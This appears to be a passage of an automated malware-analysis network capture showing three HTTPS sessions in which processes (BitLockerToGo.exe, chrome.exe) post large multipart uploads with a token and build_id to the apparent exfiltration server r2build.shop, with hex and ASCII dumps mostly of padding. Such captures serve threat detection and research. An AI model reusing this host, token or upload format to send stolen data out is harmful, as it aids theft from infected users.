                                                                                                                                                                                                                                    19192.168.2.44977294.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:54 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----djecbi5fkfusrqq9zmyc
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 66001
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:54 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 64 6a 65 63 62 69 35 66 6b 66 75 73 72 71 71 39 7a 6d 79 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 65 63 62 69 35 66 6b 66 75 73 72 71 71 39 7a 6d 79 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 65 63 62 69 35 66 6b 66 75 73 72 71 71 39 7a 6d 79 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------djecbi5fkfusrqq9zmycContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------djecbi5fkfusrqq9zmycContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------djecbi5fkfusrqq9zmycCont
                                                                                                                                                                                                                                    2025-01-09 13:01:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:54 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:55 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    20192.168.2.44977394.130.191.1824433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----ycbsjw4oz5fcjm7gvaaa
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 153381
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 79 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 79 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------ycbsjw4oz5fcjm7gvaaaContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------ycbsjw4oz5fcjm7gvaaaContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------ycbsjw4oz5fcjm7gvaaaCont
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:55 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2025-01-09 13:01:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:56 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    21192.168.2.44977594.130.191.1824437064C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----ycbsjw4oz5fcjm7gvaaa
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                    Host: r2build.shop
                                                                                                                                                                                                                                    Content-Length: 393697
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:56 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 79 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 39 34 61 37 64 62 30 31 30 31 64 30 65 31 63 65 32 31 61 37 35 61 33 64 37 35 63 61 34 0d 0a 2d 2d 2d 2d 2d 2d 79 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 30 66 30 38 35 31 62 31 66 38 31 35 37 38 38 61 34 66 34 31 37 65 34 36 36 64 39 62 37 30 30 0d 0a 2d 2d 2d 2d 2d 2d 79 63 62 73 6a 77 34 6f 7a 35 66 63 6a 6d 37 67 76 61 61 61 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------ycbsjw4oz5fcjm7gvaaaContent-Disposition: form-data; name="token"cf294a7db0101d0e1ce21a75a3d75ca4------ycbsjw4oz5fcjm7gvaaaContent-Disposition: form-data; name="build_id"30f0851b1f815788a4f417e466d9b700------ycbsjw4oz5fcjm7gvaaaCont
